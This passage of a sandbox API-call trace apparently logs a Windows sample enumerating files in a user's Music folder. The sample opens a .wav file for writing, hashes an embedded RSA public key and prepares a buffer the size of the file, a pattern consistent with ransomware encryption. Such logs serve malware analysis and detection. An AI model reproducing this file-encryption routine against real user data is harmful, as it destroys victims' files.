lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.760] PathFindFileNameW (pszPath="") returned="" [0197.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.760] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\*" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a2eabf0, ftCreationTime.dwHighDateTime=0x1d89f39, ftLastAccessTime.dwLowDateTime=0xb37640c0, ftLastAccessTime.dwHighDateTime=0x1d8a140, ftLastWriteTime.dwLowDateTime=0xb37640c0, ftLastWriteTime.dwHighDateTime=0x1d8a140, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0197.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.765] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a2eabf0, ftCreationTime.dwHighDateTime=0x1d89f39, ftLastAccessTime.dwLowDateTime=0xb37640c0, ftLastAccessTime.dwHighDateTime=0x1d8a140, ftLastWriteTime.dwLowDateTime=0xb37640c0, ftLastWriteTime.dwHighDateTime=0x1d8a140, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.766] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa301d2e0, ftCreationTime.dwHighDateTime=0x1d8a0ff, ftLastAccessTime.dwLowDateTime=0x9d787e90, ftLastAccessTime.dwHighDateTime=0x1d8a49d, ftLastWriteTime.dwLowDateTime=0x9d787e90, ftLastWriteTime.dwHighDateTime=0x1d8a49d, nFileSizeHigh=0x0, nFileSizeLow=0x14623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ah3jWN0.wav", cAlternateFileName="")) returned 1 [0197.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0197.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.766] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\ah3jWN0.wav") returned=".wav" [0197.766] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\ah3jWN0.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\ah3jwn0.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.767] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=83491) returned 1 [0197.767] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.771] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x145fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.771] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.775] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.775] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14623, lpOverlapped=0x0) returned 1 [0197.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.776] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0197.777] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.777] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.777] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.777] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.777] GetLastError () returned 0x0 [0197.777] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.777] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0197.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.778] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.778] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.778] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14620) returned 0x2af5168 [0197.779] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea890 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea8d8 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.779] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0197.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6800 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.782] GetCurrentThreadId () returned 0x5d8 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2ae0 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.783] GetCurrentThreadId () returned 0x5d8 [0197.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0197.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6800 [0197.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67e8 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6830 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea8d8 | out: hHeap=0x2c0000) returned 1 [0197.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: 